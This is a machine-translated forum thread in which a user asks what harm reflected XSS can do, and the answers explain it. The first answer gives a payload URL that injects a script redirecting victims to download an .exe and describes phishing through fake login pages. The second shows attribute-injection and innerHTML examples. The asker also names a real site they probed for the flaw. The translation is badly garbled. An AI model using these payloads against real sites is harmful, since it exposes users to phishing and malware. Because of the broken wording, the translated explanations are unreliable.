Как привести к повреждению сайт с помощью XSS/SQL injection?


я Не типа хакер, но я знаю некоторые приемы. Я готовлю безопасности, и я был действительно заботливый по отношению к этому вопросу. Каждый раз, когда injeto сценарий, является alert(), ничего опасного для узла (например). Я не веб-сайт, не будет пересылать файлы cookie. Какой это большой риск отказа XSS на сайте без DB/система входа в систему? У меня есть сайт здесь (http://www.verinha.de/commentary_english.htm), что я нашел mechendo в интернете. Да, это ошибка потенциал, но, как сайт не должен войти, и я не знаю, что black hat могу сделать. То, что "хакеры/крекеры" в самом деле поступите?

PS: чтобы испытать, что давала, я написал <script>window.location = "https://www.google.com";</script>. Меня направили в Google, и я вернулся к странице. Ничего не произошло.

Author: Pedro Henrique, 2014-06-21

2 answers

" Не существует, как правильно исследовать это. В основном вам нужно понять, кто обращается к сайту, и какие в центре внимания пользователей и часто не просто только использовать технику, например:

Предположим, что пользователи сайта имеют учетной записи на Сайте GLOB. Вы можете создать перенаправление или iframe на страницу, false Сайта GLOB с формой, и скопировать эти данные. Как пользователь ввел самостоятельно на Сайте, что есть проблема XSS он не будет считаете, что это не обманули. Другой пример можно было бы включать переадресацию .exe с целями атаки на компьютер пользователя. Это часто видели с страницы банк или виртуальные кошельки.

В примере в вопросе XSS не стойких, то есть он не получает сохраняется в пределах страницы, возможно, и не существует в базе данных. В этом случае метод должен быть адаптирован, является общим пройти скрипт через GET, когда проблема также использует некоторые поля бланк.

<?php
$name = $_GET['nome'];
echo "Bem vindo $nome<br>";
?>

Это пример очень похож на сайте упоминается, разница в том, что информация передается через GET в PHP, а не через Командную строку JavaScript. В этом случае достаточно будет отправить пользователям ссылку в качестве

http://sitexpto.com.br/?nome=<script>location.href='http://link.para/arquivo.exe';</script>

Вариант этой техники был достаточно широко используется в то время Orkut, Google уже использовала login "Com conta Google"", по умолчанию, однако, существует дополнительный параметр с именем redirect, многих отправляли в этот url-адрес с перенаправление в файл .exe и página falsa de login. Я знаю, что проблема не была связана с XSS, но я думаю, стоит упомянуть.

Сайте http://www.verinha.de, действительно, есть проблема XSS, но, анализируя исходный код, можно видеть, что результат не хранится нигде, и, что не может сообщить значение через url-адрес. Таким образом, в целом, не существует приложения, в этом случае, по крайней мере, не с помощью только этого метода.

, Надеюсь, дополняется в чем-то.

 10
Author: Pedro Henrique, 2014-06-21 15:18:49

Бы, что думать о чем-то так: Скажем, что бы текстовое поле, чтобы ввести что-то, например, имя пользователя:

User Name : <input ... value="Nome">

Теперь, вероятно, будет введен так:"onmouseover="событие

<input ... value=" "onmouseover="evento ">

Или что-то вроде: У нас есть текстовое поле, тип браузера, если digitarmos такую вещь, может появиться "Не найдено ни одного результата для [искали слово]" И если digitarmos: Код, и в браузере или на другом сайте вы не найдете ничего, если не имеет никакой защиты, может запустить скрипт. Предположим, что это код HTML:

<div>Não foi encntrado nenhum resultado para <script>alert("script")</script></div> 

Пример 2:

<script type="text/javascript">
function Pesquise(){
/*Script do navegador ou parte de pesquisa de um site*/
document.getElementById("Result").innerHTML  = "Não foi encontrado nenhum resultado para " +  document.getElementById("CaixaPesquisa").value;
}
</script>

<input id="CaixaPesquisa" type="text" value="Código aqui"/><input type="submit" value="Pesquisar" onclick="Pesquise();"/>

<div id="Result">

</div>
 -2
Author: Developer, 2017-08-23 14:33:06